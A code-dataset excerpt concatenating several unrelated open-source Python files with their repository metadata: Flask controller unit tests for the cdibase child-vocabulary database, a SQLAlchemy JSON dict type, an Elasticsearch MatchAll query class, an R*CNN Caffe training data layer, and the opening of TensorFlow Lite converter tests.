TEST_USER = models.User(
TEST_DB_ID,
TEST_EMAIL,
None,
True,
False,
False,
False,
False,
False,
False,
False
)
MALE_TEST_PERCENTILE_NAME = 'male_test_percentiles'
FEMALE_TEST_PERCENTILE_NAME = 'female_test_percentiles'
OTHER_TEST_PERCENTILE_NAME = 'other_test_percentiles'
TEST_CDI_FORMAT_NAME = 'standard'
TEST_FORMAT = models.CDIFormat(
'standard',
'standard',
'standard.yaml',
{
'categories': [
{
'words':['cat_1_word_1', 'cat_1_word_2', 'cat_1_word_3'],
'language': 'english'
},
{
'words':['cat_2_word_1', 'cat_2_word_2', 'cat_2_word_3'],
'language': 'english'
}
],
'percentiles': {
'male': MALE_TEST_PERCENTILE_NAME,
'female': FEMALE_TEST_PERCENTILE_NAME,
'other': OTHER_TEST_PERCENTILE_NAME
},
'options': [
{'name': 'said', 'value': 1},
{'name': 'not said', 'value': 0}
],
'count_as_spoken': [1],
'meta': {'cdi_type': 'standard'}
}
)
TEST_STUDY_ID = '456'
TEST_STUDY_ID_2 = '789'
TEST_SNAPSHOT_ID = 789
TEST_ITEMS_EXCLUDED = 3
TEST_EXTRA_CATEGORIES = 4
TEST_SESSION_NUM = 4
TEST_LANGUAGES = ['english']
TEST_NUM_LANGUAGES = 1
TEST_HARD_OF_HEARING = False
TEST_STUDY = 'test study'
TEST_STUDY_2 = 'test study 2'
TEST_BIRTHDAY = '2011/09/12'
TEST_BIRTHDAY_DATE = datetime.date(2011, 9, 12)
TEST_SESSION = '2013/09/12'
TEST_TOTAL_NUM_SESSIONS = 48
TEST_AGE = 21
TEST_PERCENTILE = 50
TEST_PERCENTILE_MODEL_CLS = collections.namedtuple(
'TestPercentileModel',
['details']
)
TEST_PERCENTILE_MODEL = TEST_PERCENTILE_MODEL_CLS('test details')
TEST_SUCCESSFUL_PARAMS = {
'global_id': TEST_DB_ID,
'study_id': TEST_STUDY_ID,
'study': TEST_STUDY,
'gender': constants.MALE,
'age': TEST_AGE,
'birthday': TEST_BIRTHDAY,
'session_date': TEST_SESSION,
'session_num': TEST_SESSION_NUM,
'items_excluded': TEST_ITEMS_EXCLUDED,
'extra_categories': TEST_EXTRA_CATEGORIES,
'total_num_sessions': TEST_TOTAL_NUM_SESSIONS,
'hard_of_hearing': 'off',
'cat_1_word_1_report': '1',
'cat_1_word_2_report': '0',
'cat_1_word_3_report': '1',
'cat_2_word_1_report': '0',
'cat_2_word_2_report': '1',
'cat_2_word_3_report': '0'
}
TEST_EXPECTED_SNAPSHOT = models.SnapshotMetadata(
None,
TEST_DB_ID,
TEST_STUDY_ID,
TEST_STUDY,
constants.MALE,
TEST_AGE,
TEST_BIRTHDAY,
TEST_SESSION,
TEST_SESSION_NUM,
TEST_TOTAL_NUM_SESSIONS,
3,
TEST_ITEMS_EXCLUDED,
TEST_PERCENTILE,
TEST_EXTRA_CATEGORIES,
0,
TEST_LANGUAGES,
TEST_NUM_LANGUAGES,
'standard',
constants.EXPLICIT_FALSE,
False
)
TEST_EXPECTED_SNAPSHOT_2 = models.SnapshotMetadata(
None,
TEST_DB_ID,
TEST_STUDY_ID_2,
TEST_STUDY_2,
constants.MALE,
TEST_AGE,
TEST_BIRTHDAY,
TEST_SESSION,
TEST_SESSION_NUM,
TEST_TOTAL_NUM_SESSIONS,
3,
TEST_ITEMS_EXCLUDED,
TEST_PERCENTILE,
TEST_EXTRA_CATEGORIES,
0,
TEST_LANGUAGES,
TEST_NUM_LANGUAGES,
'standard',
constants.EXPLICIT_FALSE,
False
)
TEST_EXPECTED_WORD_ENTRIES = {
'cat_1_word_1': 1,
'cat_1_word_2': 0,
'cat_1_word_3': 1,
'cat_2_word_1': 0,
'cat_2_word_2': 1,
'cat_2_word_3': 0
}
class EnterDataControllersTests(unittest.TestCase):
def setUp(self):
self.app = cdibase.app
self.app.debug = True
self.__callback_called = False
def __run_with_mocks(self, on_start, body, on_end):
with unittest.mock.patch('prog_code.util.user_util.get_user') as mock_get_user:
with unittest.mock.patch('prog_code.util.db_util.load_cdi_model') as mock_load_cdi_model:
with unittest.mock.patch('prog_code.util.db_util.insert_snapshot') as mock_insert_snapshot:
with unittest.mock.patch('prog_code.util.db_util.report_usage') as mock_report_usage:
with unittest.mock.patch('prog_code.util.db_util.load_percentile_model') as mock_load_percentile_model:
with unittest.mock.patch('prog_code.util.math_util.find_percentile') as mock_find_percentile:
with unittest.mock.patch('prog_code.util.filter_util.run_search_query') as mock_run_search_query:
with unittest.mock.patch('prog_code.util.db_util.lookup_global_participant_id') as mock_lookup_global_participant_id:
with unittest.mock.patch('prog_code.util.db_util.update_participant_metadata') as mock_update_participant_metadata:
with unittest.mock.patch('prog_code.util.recalc_util.recalculate_ages_and_percentiles') as mock_recalculate_ages_and_percentiles:
with unittest.mock.patch('prog_code.util.db_util.load_cdi_model_listing') as mock_load_cdi_model_listing:
mocks = {
'get_user': mock_get_user,
'load_cdi_model': mock_load_cdi_model,
'insert_snapshot': mock_insert_snapshot,
'report_usage': mock_report_usage,
'load_percentile_model': mock_load_percentile_model,
'find_percentile': mock_find_percentile,
'run_search_query': mock_run_search_query,
'lookup_global_participant_id': mock_lookup_global_participant_id,
'update_participant_metadata': mock_update_participant_metadata,
'recalculate_ages_and_percentiles': mock_recalculate_ages_and_percentiles,
'load_cdi_model_listing': mock_load_cdi_model_listing
}
on_start(mocks)
body()
on_end(mocks)
self.__callback_called = True
def __default_on_start(self, mocks):
mocks['get_user'].return_value = TEST_USER
mocks['load_cdi_model'].return_value = TEST_FORMAT
def __default_on_end(self, mocks):
mocks['get_user'].assert_called_with(TEST_EMAIL)
mocks['load_cdi_model'].assert_called_with(TEST_CDI_FORMAT_NAME)
def __run_with_default_mocks(self, body):
self.__run_with_mocks(
lambda mocks: self.__default_on_start(mocks),
body,
lambda mocks: self.__default_on_end(mocks),
)
def __assert_callback(self):
self.assertTrue(self.__callback_called)
def check_lookup_studies_metadata(self, returned_metadata):
"""Run assertions that the provided metadata matches the test snapshot.
@param returned_metadata: The metadata to check.
@type returned_metadata: dict
"""
self.assertEqual(
returned_metadata['gender'],
TEST_EXPECTED_SNAPSHOT.gender
)
self.assertEqual(
returned_metadata['birthday'],
TEST_EXPECTED_SNAPSHOT.birthday
)
self.assertEqual(
returned_metadata['hard_of_hearing'],
TEST_EXPECTED_SNAPSHOT.hard_of_hearing
)
self.assertEqual(
returned_metadata['languages'],
TEST_EXPECTED_SNAPSHOT.languages
)
def test_format_for_enter_data(self):
def body():
with self.app.test_client() as client:
with client.session_transaction() as sess:
sess['email'] = TEST_EMAIL
url = '/base/enter_data/%s' % TEST_CDI_FORMAT_NAME
client.get(url)
with client.session_transaction() as sess:
err = sess.get(constants.ERROR_ATTR, None)
self.assertEqual(err, None)
url = '/base/enter_data/%s' % 'invalid format'
client.get(url)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
def on_start(mocks):
mocks['get_user'].return_value = TEST_USER
mocks['load_cdi_model'].side_effect = [
TEST_FORMAT,
None
]
def on_end(mocks):
mocks['get_user'].assert_called_with(TEST_EMAIL)
mocks['load_cdi_model'].assert_any_call(TEST_CDI_FORMAT_NAME)
mocks['load_cdi_model'].assert_any_call('invalid format')
self.__run_with_mocks(on_start, body, on_end)
self.__assert_callback()
def test_missing_enter_data_params(self):
def body():
target_url = '/base/enter_data/%s' % TEST_CDI_FORMAT_NAME
with self.app.test_client() as client:
with client.session_transaction() as sess:
sess['email'] = TEST_EMAIL
test_params = copy.copy(TEST_SUCCESSFUL_PARAMS)
del test_params['study_id']
client.post(target_url, data=test_params)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(confirmation_attr, None)
del sess[constants.ERROR_ATTR]
test_params = copy.copy(TEST_SUCCESSFUL_PARAMS)
del test_params['study']
client.post(target_url, data=test_params)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(confirmation_attr, None)
del sess[constants.ERROR_ATTR]
test_params = copy.copy(TEST_SUCCESSFUL_PARAMS)
del test_params['gender']
client.post(target_url, data=test_params)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(confirmation_attr, None)
del sess[constants.ERROR_ATTR]
test_params = copy.copy(TEST_SUCCESSFUL_PARAMS)
del test_params['age']
client.post(target_url, data=test_params)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(confirmation_attr, None)
del sess[constants.ERROR_ATTR]
test_params = copy.copy(TEST_SUCCESSFUL_PARAMS)
del test_params['birthday']
client.post(target_url, data=test_params)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(confirmation_attr, None)
del sess[constants.ERROR_ATTR]
test_params = copy.copy(TEST_SUCCESSFUL_PARAMS)
del test_params['session_date']
client.post(target_url, data=test_params)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(confirmation_attr, None)
del sess[constants.ERROR_ATTR]
test_params = copy.copy(TEST_SUCCESSFUL_PARAMS)
del test_params['session_num']
client.post(target_url, data=test_params)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(confirmation_attr, None)
del sess[constants.ERROR_ATTR]
test_params = copy.copy(TEST_SUCCESSFUL_PARAMS)
del test_params['items_excluded']
client.post(target_url, data=test_params)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(confirmation_attr, None)
del sess[constants.ERROR_ATTR]
test_params = copy.copy(TEST_SUCCESSFUL_PARAMS)
del test_params['extra_categories']
client.post(target_url, data=test_params)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(confirmation_attr, None)
del sess[constants.ERROR_ATTR]
test_params = copy.copy(TEST_SUCCESSFUL_PARAMS)
del test_params['total_num_sessions']
client.post(target_url, data=test_params)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(confirmation_attr, None)
del sess[constants.ERROR_ATTR]
self.__run_with_default_mocks(body)
self.__assert_callback()
def test_invalid_enter_data_params(self):
def body():
target_url = '/base/enter_data/%s' % TEST_CDI_FORMAT_NAME
with self.app.test_client() as client:
with client.session_transaction() as sess:
sess['email'] = TEST_EMAIL
test_params = copy.copy(TEST_SUCCESSFUL_PARAMS)
test_params['gender'] = 'invalid'
client.post(target_url, data=test_params)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(confirmation_attr, None)
del sess[constants.ERROR_ATTR]
test_params = copy.copy(TEST_SUCCESSFUL_PARAMS)
test_params['age'] = 'invalid'
client.post(target_url, data=test_params)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(confirmation_attr, None)
del sess[constants.ERROR_ATTR]
test_params = copy.copy(TEST_SUCCESSFUL_PARAMS)
test_params['birthday'] = 'invalid'
client.post(target_url, data=test_params)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(confirmation_attr, None)
del sess[constants.ERROR_ATTR]
test_params = copy.copy(TEST_SUCCESSFUL_PARAMS)
test_params['session_date'] = 'invalid'
client.post(target_url, data=test_params)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(confirmation_attr, None)
del sess[constants.ERROR_ATTR]
test_params = copy.copy(TEST_SUCCESSFUL_PARAMS)
test_params['session_num'] = 'invalid'
client.post(target_url, data=test_params)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(confirmation_attr, None)
del sess[constants.ERROR_ATTR]
test_params = copy.copy(TEST_SUCCESSFUL_PARAMS)
test_params['items_excluded'] = 'invalid'
client.post(target_url, data=test_params)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(confirmation_attr, None)
del sess[constants.ERROR_ATTR]
test_params = copy.copy(TEST_SUCCESSFUL_PARAMS)
test_params['extra_categories'] = 'invalid'
client.post(target_url, data=test_params)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(confirmation_attr, None)
del sess[constants.ERROR_ATTR]
test_params = copy.copy(TEST_SUCCESSFUL_PARAMS)
test_params['total_num_sessions'] = 'invalid'
client.post(target_url, data=test_params)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(confirmation_attr, None)
del sess[constants.ERROR_ATTR]
self.__run_with_default_mocks(body)
self.__assert_callback()
def test_success_enter_data(self):
def body():
target_url = '/base/enter_data/%s' % TEST_CDI_FORMAT_NAME
with self.app.test_client() as client:
with client.session_transaction() as sess:
sess['email'] = TEST_EMAIL
client.post(target_url, data=TEST_SUCCESSFUL_PARAMS)
with client.session_transaction() as sess:
error_attr = sess.get(constants.ERROR_ATTR, None)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(error_attr, None)
self.assertNotEqual(confirmation_attr, None)
def on_start(mocks):
mocks['get_user'].return_value = TEST_USER
mocks['load_cdi_model'].return_value = TEST_FORMAT
mocks['load_percentile_model'].return_value = TEST_PERCENTILE_MODEL
mocks['find_percentile'].return_value = TEST_PERCENTILE
def on_end(mocks):
mocks['get_user'].assert_called_with(TEST_EMAIL)
mocks['load_cdi_model'].assert_called_with(TEST_CDI_FORMAT_NAME)
mocks['load_percentile_model'].assert_called_with(
MALE_TEST_PERCENTILE_NAME
)
mocks['find_percentile'].assert_called_with(
'test details',
3,
TEST_AGE,
6
)
mocks['report_usage'].assert_called_with(
'test.email@example.com',
'Enter Data',
unittest.mock.ANY
)
mocks['insert_snapshot'].assert_called_with(
TEST_EXPECTED_SNAPSHOT,
TEST_EXPECTED_WORD_ENTRIES
)
self.__run_with_mocks(on_start, body, on_end)
self.__assert_callback()
def test_lookup_studies_by_global_id(self):
def body():
with self.app.test_client() as client:
with client.session_transaction() as sess:
sess['email'] = TEST_EMAIL
lookup_user_data = {
'method': 'by_global_id',
'global_id': TEST_DB_ID
}
result_info = client.post(
'/base/edit_data/lookup_user',
data=lookup_user_data
)
result = json.loads(result_info.data)
returned_global_id = result['global_id']
returned_studies = result['cdis']
self.assertEqual(returned_global_id, TEST_DB_ID)
self.assertEqual(len(returned_studies), 2)
if returned_studies[0]['study'] == TEST_STUDY:
self.assertEqual(returned_studies[0]['study'], TEST_STUDY)
self.assertEqual(returned_studies[0]['study_id'], TEST_STUDY_ID)
self.assertEqual(returned_studies[1]['study'], TEST_STUDY_2)
self.assertEqual(returned_studies[1]['study_id'], TEST_STUDY_ID_2)
else:
self.assertEqual(returned_studies[0]['study'], TEST_STUDY_2)
self.assertEqual(returned_studies[0]['study_id'], TEST_STUDY_ID_2)
self.assertEqual(returned_studies[1]['study'], TEST_STUDY)
self.assertEqual(returned_studies[1]['study_id'], TEST_STUDY_ID)
self.check_lookup_studies_metadata(result['metadata'])
def on_start(mocks):
ret_list = [
TEST_EXPECTED_SNAPSHOT,
TEST_EXPECTED_SNAPSHOT_2
]
mocks['get_user'].return_value = TEST_USER
mocks['run_search_query'].return_value = ret_list
def on_end(mocks):
mocks['get_user'].assert_called_with(TEST_EMAIL)
mocks['run_search_query'].assert_called_with(
[models.Filter('child_id', 'eq', TEST_DB_ID)],
constants.SNAPSHOTS_DB_TABLE
)
self.__run_with_mocks(on_start, body, on_end)
self.__assert_callback()
def test_lookup_studies_by_study_id(self):
def body():
with self.app.test_client() as client:
with client.session_transaction() as sess:
sess['email'] = TEST_EMAIL
lookup_user_data = {
'method': 'by_study_id',
'study': TEST_STUDY,
'study_id': TEST_STUDY_ID
}
result_info = client.post(
'/base/edit_data/lookup_user',
data=lookup_user_data
)
result = json.loads(result_info.data)
returned_global_id = result['global_id']
returned_studies = result['cdis']
self.assertEqual(returned_global_id, TEST_DB_ID)
self.assertEqual(len(returned_studies), 2)
if returned_studies[0]['study'] == TEST_STUDY:
self.assertEqual(returned_studies[0]['study'], TEST_STUDY)
self.assertEqual(returned_studies[0]['study_id'], TEST_STUDY_ID)
self.assertEqual(returned_studies[1]['study'], TEST_STUDY_2)
self.assertEqual(returned_studies[1]['study_id'], TEST_STUDY_ID_2)
else:
self.assertEqual(returned_studies[0]['study'], TEST_STUDY_2)
self.assertEqual(returned_studies[0]['study_id'], TEST_STUDY_ID_2)
self.assertEqual(returned_studies[1]['study'], TEST_STUDY)
self.assertEqual(returned_studies[1]['study_id'], TEST_STUDY_ID)
self.check_lookup_studies_metadata(result['metadata'])
def on_start(mocks):
ret_list = [
TEST_EXPECTED_SNAPSHOT,
TEST_EXPECTED_SNAPSHOT_2
]
mocks['get_user'].return_value = TEST_USER
mocks['lookup_global_participant_id'].return_value = TEST_DB_ID
mocks['run_search_query'].return_value = ret_list
def on_end(mocks):
mocks['get_user'].assert_called_with(TEST_EMAIL)
mocks['lookup_global_participant_id'].assert_called_with(
TEST_STUDY,
TEST_STUDY_ID
)
mocks['run_search_query'].assert_called_with(
[models.Filter('child_id', 'eq', TEST_DB_ID)],
constants.SNAPSHOTS_DB_TABLE
)
self.__run_with_mocks(on_start, body, on_end)
self.__assert_callback()
def test_edit_metadata(self):
self.__new_birthday = '2014/12/28'
self.__new_languages = ['english', 'spanish']
self.__ret_list = [
TEST_EXPECTED_SNAPSHOT,
TEST_EXPECTED_SNAPSHOT_2,
]
def body():
with self.app.test_client() as client:
with client.session_transaction() as sess:
sess['email'] = TEST_EMAIL
new_metadata = {
'global_id': TEST_DB_ID,
'gender': constants.FEMALE,
'birthday': self.__new_birthday,
'hard_of_hearing': constants.EXPLICIT_TRUE,
'languages': ','.join(self.__new_languages),
'snapshot_ids': json.dumps([
{'study': TEST_STUDY, 'id': '1'},
{'study': TEST_STUDY_2, 'id': '2'}
])
}
client.post(
'/base/edit_data',
data=new_metadata
)
def on_start(mocks):
mocks['get_user'].return_value = TEST_USER
mocks['run_search_query'].return_value = self.__ret_list
def on_end(mocks):
mocks['get_user'].assert_called_with(
TEST_EMAIL
)
mocks['report_usage'].assert_called_with(
'test.email@example.com',
'Update Metadata',
'{"global_id": "1"}'
)
mocks['update_participant_metadata'].assert_called_with(
TEST_DB_ID,
constants.FEMALE,
self.__new_birthday,
constants.EXPLICIT_TRUE,
self.__new_languages,
snapshot_ids=[
{'study': TEST_STUDY, 'id': '1'},
{'study': TEST_STUDY_2, 'id': '2'}
]
)
mocks['run_search_query'].assert_called_with(
[models.Filter('child_id', 'eq', TEST_DB_ID)],
constants.SNAPSHOTS_DB_TABLE
)
mocks['recalculate_ages_and_percentiles'].assert_called_with(
self.__ret_list
)
self.__run_with_mocks(on_start, body, on_end)
self.__assert_callback()
|
Samnsparky/cdibase
|
prog_code/controller/enter_data_controllers_test.py
|
Python
|
gpl-3.0
| 28,902 | 0.001799 |
# $File: _ext_type.py
# $Date: Wed Feb 22 15:04:06 2012 +0800
#
# Copyright (C) 2012 the pynojo development team <see AUTHORS file>
#
# Contributors to this file:
# Kai Jia <jia.kai66@gmail.com>
#
# This file is part of pynojo
#
# pynojo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# pynojo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with pynojo. If not, see <http://www.gnu.org/licenses/>.
#
"""Extra SQLAlchemy ORM types"""
__all__ = ['JSONEncodeDict']
import cjson
from sqlalchemy.types import TypeDecorator, String
from sqlalchemy.ext.mutable import Mutable
from pynojo.exc import PynojoRuntimeError
class JSONEncodeDict(TypeDecorator):
"""Represents an mutable python *dict* as a json-encoded string."""
# pylint: disable=W0223
impl = String
def process_bind_param(self, value, dialect):
if value is not None:
value = cjson.encode(value)
if len(value) > self.length:
raise PynojoRuntimeError(_(
'{class_name}: encoded string too long',
class_name = self.__class__.__name__))
return value
def process_result_value(self, value, dialect):
if value is not None:
value = cjson.decode(value)
return value
class _JSONEncodeDictMutabilize(Mutable, dict):
@classmethod
def coerce(cls, key, value):
if not isinstance(value, _JSONEncodeDictMutabilize):
if isinstance(value, dict):
return _JSONEncodeDictMutabilize(value)
return Mutable.coerce(key, value)
else:
return value
def __setitem__(self, key, value):
dict.__setitem__(self, key, value)
self.changed()
def __delitem__(self, key):
dict.__delitem__(self, key)
self.changed()
_JSONEncodeDictMutabilize.associate_with(JSONEncodeDict)
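# Illustrative usage sketch (not part of the original module): a mapped class
# can declare a column of this type; in-place edits of the dict are then
# tracked by _JSONEncodeDictMutabilize and flushed on commit.  The class and
# column names below are made up.
#
#     from sqlalchemy import Column, Integer
#
#     class Example(Base):                       # Base = the project's declarative base
#         __tablename__ = 'example'
#         id = Column(Integer, primary_key=True)
#         data = Column(JSONEncodeDict(255))     # JSON string capped at 255 chars
#
#     row.data['key'] = 'value'                  # mutation detected, persisted on commit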
|
zxytim/pynojo
|
pynojo/model/_ext_type.py
|
Python
|
gpl-3.0
| 2,330 | 0.003863 |
__author__ = 'Joe Linn'
from . import abstract
class MatchAll(abstract.AbstractQuery):
def __init__(self):
super(MatchAll, self).__init__()
self._params = {}
|
jlinn/pylastica
|
pylastica/query/matchall.py
|
Python
|
apache-2.0
| 180 | 0.005556 |
# --------------------------------------------------------
# Fast R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
# --------------------------------------------------------
# R*CNN
# Written by Georgia Gkioxari, 2015.
# See LICENSE in the project root for license information.
# --------------------------------------------------------
"""The data layer used during training to train a R*CNN network.
AttributesDataLayer implements a Caffe Python layer.
"""
import caffe
from fast_rcnn.config import cfg
from attr_data_layer.minibatch import get_minibatch
import numpy as np
import yaml
from multiprocessing import Process, Queue
# import pdb
class AttributesDataLayer(caffe.Layer):
"""R*CNN data layer used during training for attributes."""
def _shuffle_roidb_inds(self):
"""Randomly permute the training roidb."""
self._perm = np.random.permutation(np.arange(len(self._roidb)))
self._cur = 0
def _get_next_minibatch_inds(self):
"""Return the roidb indices for the next minibatch."""
if self._cur + cfg.TRAIN.IMS_PER_BATCH >= len(self._roidb):
self._shuffle_roidb_inds()
db_inds = self._perm[self._cur:self._cur + cfg.TRAIN.IMS_PER_BATCH]
self._cur += cfg.TRAIN.IMS_PER_BATCH
return db_inds
def _get_next_minibatch(self):
"""Return the blobs to be used for the next minibatch.
If cfg.TRAIN.USE_PREFETCH is True, then blobs will be computed in a
separate process and made available through self._blob_queue.
"""
if cfg.TRAIN.USE_PREFETCH:
return self._blob_queue.get()
else:
db_inds = self._get_next_minibatch_inds()
minibatch_db = [self._roidb[i] for i in db_inds]
return get_minibatch(minibatch_db, self._num_classes)
def set_roidb(self, roidb):
"""Set the roidb to be used by this layer during training."""
self._roidb = roidb
self._shuffle_roidb_inds()
if cfg.TRAIN.USE_PREFETCH:
self._blob_queue = Queue(10)
self._prefetch_process = BlobFetcher(self._blob_queue,
self._roidb,
self._num_classes)
self._prefetch_process.start()
# Terminate the child process when the parent exists
def cleanup():
print 'Terminating BlobFetcher'
self._prefetch_process.terminate()
self._prefetch_process.join()
import atexit
atexit.register(cleanup)
def setup(self, bottom, top):
"""Setup the RoIDataLayer."""
# parse the layer parameter string, which must be valid YAML
layer_params = yaml.load(self.param_str_)
self._num_classes = layer_params['num_classes']
self._name_to_top_map = {
'data': 0,
'rois': 1,
'labels': 2}
# data blob: holds a batch of N images, each with 3 channels
# The height and width (100 x 100) are dummy values
top[0].reshape(1, 3, 100, 100)
# rois blob: holds R regions of interest, each is a 5-tuple
# (n, x1, y1, x2, y2) specifying an image batch index n and a
# rectangle (x1, y1, x2, y2)
top[1].reshape(1, 5)
# labels blob: holds labels for each attribute
top[2].reshape(1, self._num_classes)
def forward(self, bottom, top):
"""Get blobs and copy them into this layer's top blob vector."""
blobs = self._get_next_minibatch()
for blob_name, blob in blobs.iteritems():
top_ind = self._name_to_top_map[blob_name]
# Reshape net's input blobs
top[top_ind].reshape(*(blob.shape))
# Copy data into net's input blobs
top[top_ind].data[...] = blob.astype(np.float32, copy=False)
def backward(self, top, propagate_down, bottom):
"""This layer does not propagate gradients."""
pass
def reshape(self, bottom, top):
"""Reshaping happens during the call to forward."""
pass
class BlobFetcher(Process):
"""Experimental class for prefetching blobs in a separate process."""
def __init__(self, queue, roidb, num_classes):
super(BlobFetcher, self).__init__()
self._queue = queue
self._roidb = roidb
self._num_classes = num_classes
self._perm = None
self._cur = 0
self._shuffle_roidb_inds()
# fix the random seed for reproducibility
np.random.seed(cfg.RNG_SEED)
def _shuffle_roidb_inds(self):
"""Randomly permute the training roidb."""
# TODO(rbg): remove duplicated code
self._perm = np.random.permutation(np.arange(len(self._roidb)))
self._cur = 0
def _get_next_minibatch_inds(self):
"""Return the roidb indices for the next minibatch."""
# TODO(rbg): remove duplicated code
if self._cur + cfg.TRAIN.IMS_PER_BATCH >= len(self._roidb):
self._shuffle_roidb_inds()
db_inds = self._perm[self._cur:self._cur + cfg.TRAIN.IMS_PER_BATCH]
self._cur += cfg.TRAIN.IMS_PER_BATCH
return db_inds
def run(self):
print 'BlobFetcher started'
while True:
db_inds = self._get_next_minibatch_inds()
minibatch_db = [self._roidb[i] for i in db_inds]
blobs = get_minibatch(minibatch_db, self._num_classes)
self._queue.put(blobs)
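# Illustrative sketch (not part of the original file): how this Python layer is
# typically wired into a train prototxt.  Only 'num_classes' is read by setup()
# above; the value 41 here is a placeholder.
#
#   layer {
#     name: "data"
#     type: "Python"
#     top: "data"
#     top: "rois"
#     top: "labels"
#     python_param {
#       module: "attr_data_layer.layer"
#       layer: "AttributesDataLayer"
#       param_str: "'num_classes': 41"
#     }
#   }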
|
gkioxari/RstarCNN
|
lib/attr_data_layer/layer.py
|
Python
|
bsd-2-clause
| 5,647 | 0.000708 |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for lite.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tempfile
import numpy as np
from tensorflow.contrib.lite.python import lite
from tensorflow.contrib.lite.python import lite_constants
from tensorflow.contrib.lite.python.interpreter import Interpreter
from tensorflow.python import keras
from tensorflow.python.client import session
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops.variables import global_variables_initializer as _global_variables_initializer
from tensorflow.python.platform import gfile
from tensorflow.python.platform import resource_loader
from tensorflow.python.platform import test
from tensorflow.python.saved_model import saved_model
from tensorflow.python.training.training_util import write_graph
class FromConstructor(test_util.TensorFlowTestCase):
# Tests invalid constructors using a dummy value for the GraphDef.
def testInvalidConstructor(self):
message = ('If input_tensors and output_tensors are None, both '
'input_arrays_with_shape and output_arrays must be defined.')
# `output_arrays` is not defined.
with self.assertRaises(ValueError) as error:
lite.TocoConverter(
None, None, [], input_arrays_with_shape=[('input', [3, 9])])
self.assertEqual(message, str(error.exception))
# `input_arrays_with_shape` is not defined.
with self.assertRaises(ValueError) as error:
lite.TocoConverter(None, [], None, output_arrays=['output'])
self.assertEqual(message, str(error.exception))
# Tests valid constructors using a dummy value for the GraphDef.
def testValidConstructor(self):
converter = lite.TocoConverter(
None,
None,
None,
input_arrays_with_shape=[('input', [3, 9])],
output_arrays=['output'])
self.assertFalse(converter._has_valid_tensors())
self.assertEqual(converter.get_input_arrays(), ['input'])
with self.assertRaises(ValueError) as error:
converter._set_batch_size(1)
self.assertEqual(
'The batch size cannot be set for this model. Please use '
'input_shapes parameter.', str(error.exception))
converter = lite.TocoConverter(None, ['input_tensor'], ['output_tensor'])
self.assertTrue(converter._has_valid_tensors())
class FromSessionTest(test_util.TensorFlowTestCase):
def testFloat(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
out_tensor = in_tensor + in_tensor
sess = session.Session()
